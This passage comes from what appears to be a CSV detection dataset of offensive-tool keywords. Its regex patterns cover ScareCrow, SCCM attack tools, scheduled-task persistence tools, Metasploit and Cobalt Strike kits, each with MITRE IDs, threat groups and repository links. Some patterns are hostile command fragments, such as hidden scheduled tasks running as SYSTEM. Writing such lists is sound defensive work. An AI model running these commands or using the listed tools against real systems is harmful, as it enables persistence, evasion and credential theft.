XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58142" "*ScareCrow/limelighter*",".{0,1000}ScareCrow\/limelighter.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58143" 
"*ScareCrow/Loader*",".{0,1000}ScareCrow\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58144" "*ScareCrow/Utils*",".{0,1000}ScareCrow\/Utils.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58145" "*ScareCrow_*_darwin_amd64*",".{0,1000}ScareCrow_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58146" "*ScareCrow_*_linux_amd64*",".{0,1000}ScareCrow_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR 
bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58147" "*ScareCrow_*amd64*",".{0,1000}ScareCrow_.{0,1000}amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58148" "*ScareCrow_checksums.txt*",".{0,1000}ScareCrow_checksums\.txt.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58149" "*SCCM_DLLSiteloading.txt*",".{0,1000}SCCM_DLLSiteloading\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","58150" "*sccmdecryptpoc.*",".{0,1000}sccmdecryptpoc\..{0,1000}","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58151" "*sccmhunter.db",".{0,1000}sccmhunter\.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory 
domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58152" "*sccmhunter.git*",".{0,1000}sccmhunter\.git.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58153" "*sccmhunter.py*",".{0,1000}sccmhunter\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58154" "*SCCMSecrets.py*",".{0,1000}SCCMSecrets\.py.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","1","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","58155" "*SCCMVNC.exe*",".{0,1000}SCCMVNC\.exe.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. 
This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","1","N/A","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","58156" "*sccmwtf.py*",".{0,1000}sccmwtf\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58157" "*scdivert localhost *",".{0,1000}scdivert\slocalhost\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58158" "*scecli\0evilpwfilter*",".{0,1000}scecli\\0evilpwfilter.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected over time. 
all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tool","https://github.com/CyDefUnicorn/OSCP-Archives","1","0","N/A","N/A","N/A","7","620","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z","58159" "*scheduledtask_utils.py *",".{0,1000}scheduledtask_utils\.py\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","58160" "*ScheduleRunner.csproj*",".{0,1000}ScheduleRunner\.csproj.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","58161" "*ScheduleRunner.exe*",".{0,1000}ScheduleRunner\.exe.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","58162" "*ScheduleRunner.sln*",".{0,1000}ScheduleRunner\.sln.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","58163" 
"*schlamperei.x86.dll*",".{0,1000}schlamperei\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58165" "*schshell.cna*",".{0,1000}schshell\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58167" "*SchTask.exe C:\Windows\System32\cmd.exe *",".{0,1000}SchTask\.exe\sC\:\\Windows\\System32\\cmd\.exe\s.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","58168" "*SchTask_0x727/releases*",".{0,1000}SchTask_0x727\/releases.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","58169" "*schtask_callback*",".{0,1000}schtask_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","58170" "*SchTaskBackdoor.*",".{0,1000}SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58171" "*schtasks /create /tn ""CursorSvc""*",".{0,1000}schtasks\s\/create\s\/tn\s\""CursorSvc\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More 
Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","58178" "*schtasks /create /tn *Constants.PERSISTENCE_WINDOWS_TASK +*",".{0,1000}schtasks\s\/create\s\/tn\s.{0,1000}Constants\.PERSISTENCE_WINDOWS_TASK\s\+.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","58179" "*schtasks /create /tn aitsch /tr * /sc EINMAL /st 00:00:00 /ru ""SYSTEM"" >*",".{0,1000}schtasks\s\/create\s\/tn\saitsch\s\/tr\s.{0,1000}\s\/sc\sEINMAL\s\/st\s00\:00\:00\s\/ru\s\""SYSTEM\""\s\>.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","58180" "*schtasks.exe /create /sc ONCE /tn shutdown /st %tmg% /tr *shutdown.exe*",".{0,1000}schtasks\.exe\s\/create\s\/sc\sONCE\s\/tn\sshutdown\s\/st\s\%tmg\%\s\/tr\s.{0,1000}shutdown\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 
- T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","58184" "*schtasks_elevator*",".{0,1000}schtasks_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","58185" "*schtasks_exploit *",".{0,1000}schtasks_exploit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","58186" 
"*schtasksabuse.rb*",".{0,1000}schtasksabuse\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58187" "*SchTasksImplant*",".{0,1000}SchTasksImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58188" "*schtquery * full*",".{0,1000}schtquery\s.{0,1000}\sfull.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - 